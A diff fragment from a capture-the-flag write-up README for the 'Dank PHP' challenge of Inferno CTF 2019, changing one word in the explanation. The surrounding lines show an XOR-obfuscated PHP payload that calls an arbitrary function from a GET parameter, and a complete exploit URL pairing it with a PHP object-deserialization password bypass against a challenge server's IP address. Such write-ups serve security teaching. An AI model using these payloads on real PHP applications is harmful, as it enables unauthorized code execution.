m3ssap0/CTF-Writeups/Inferno CTF 2019/Dank PHP/README.md

 $_="`{{{"^"?<>/";${$_}[_]();
 ```

 Putting everything together, you can craft the final URL to invoke.
-The last thing to do is to specify the HTTP GET parameter called `_` where the name of the function to call will be specified.
+The last thing to do is to specify the HTTP GET parameter called `_` where the name of the function to call will be passed.

 ```
 http://104.197.168.32:17010/?id=O:4:%22user%22:3:{s:4:%22name%22;s:5:%22admin%22;s:6:%22secret%22;s:6:%22secret%22;s:4:%22pass%22;R:3;}&caption=$_=%22`{{{%22^%22?%3C%3E/%22;${$_}[_]();&_=echoFlag